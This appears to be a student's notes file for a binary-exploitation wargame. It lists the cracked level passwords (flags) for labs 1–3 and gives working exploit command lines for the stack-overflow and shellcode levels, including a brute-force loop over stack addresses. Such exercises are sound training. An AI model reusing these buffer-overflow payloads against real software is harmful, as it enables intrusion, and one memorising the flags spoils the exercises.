CRACKED LOGIN PASSWORDS
=======================
Passwords are present in /home/labXX/.pass file (which can only be viewed by privileged user)


LAB1 (Reverse Engineering)
--------------------------
lab1C 	- lab01start
lab1B 	- n0_str1ngs_n0_pr0bl3m
lab1A 	- 1337_3nCRyptI0n_br0
lab1end - 1uCKy_Gue55 

***********************************************************

LAB2 (Memory Corruption - basic stack overflow)
-----------------------------------------------
lab2C	- lab02start 
lab2B	- 1m_all_ab0ut_d4t_b33f
lab2A	- i_c4ll_wh4t_i_w4nt_n00b	
lab2end - D1d_y0u_enj0y_y0ur_cats?

Exploit Inputs
lab2C - $ /levels/lab02/lab2C $(python2 -c 'print "A"*15 + "\xef\xbe\xad\xde"')
lab2B - $ /levels/lab02/lab2B $(python2 -c "print 'A'*27 + '\xbd\x86\x04\x08' + '\xcc\xcc\xcc\xcc' + '\xd0\x87\x04\x08' ")
lab2A - $ (python2 -c 'print "A\x0a"*9 + "X"*12 + "\x00\x00\x00" + "B\x0a"*8 + "X"*12 + "\x00\x00\x00" + "B" + "C\x0a"*5 + "\xfd\x0a\x86\x0a\x04\x0a\x08\x0a"';cat) | /levels/lab02/lab2A

***********************************************************

LAB3 (Shellcoding - crafting/injecting custom shellcode)
--------------------------------------------------------
lab3C	- lab03start
lab3B   - th3r3_iz_n0_4dm1ns_0n1y_U! 
lab3A   - wh0_n33ds_5h3ll3_wh3n_U_h4z_s4nd
lab3end - sw00g1ty_sw4p_h0w_ab0ut_d3m_h0ps

Exploit Inputs
lab3C - $ (python2 exploit_lab3C.py; cat) |/levels/lab03/lab3C
lab3B - $ python3 exploit.py | /levels/lab03/lab3B
lab3A - $ for i in {3221222600..3221222900}; do (python exploit.py $i;cat) | /levels/lab03/lab3A; done

***********************************************************

LAB4 (Format String Exploits)
-----------------------------
lab4C   - lab04start
lab4B   - 

***********************************************************

PROJECT1 (200PT CTF)
--------------------
/home/project1_priv/.pass   - 


***********************************************************





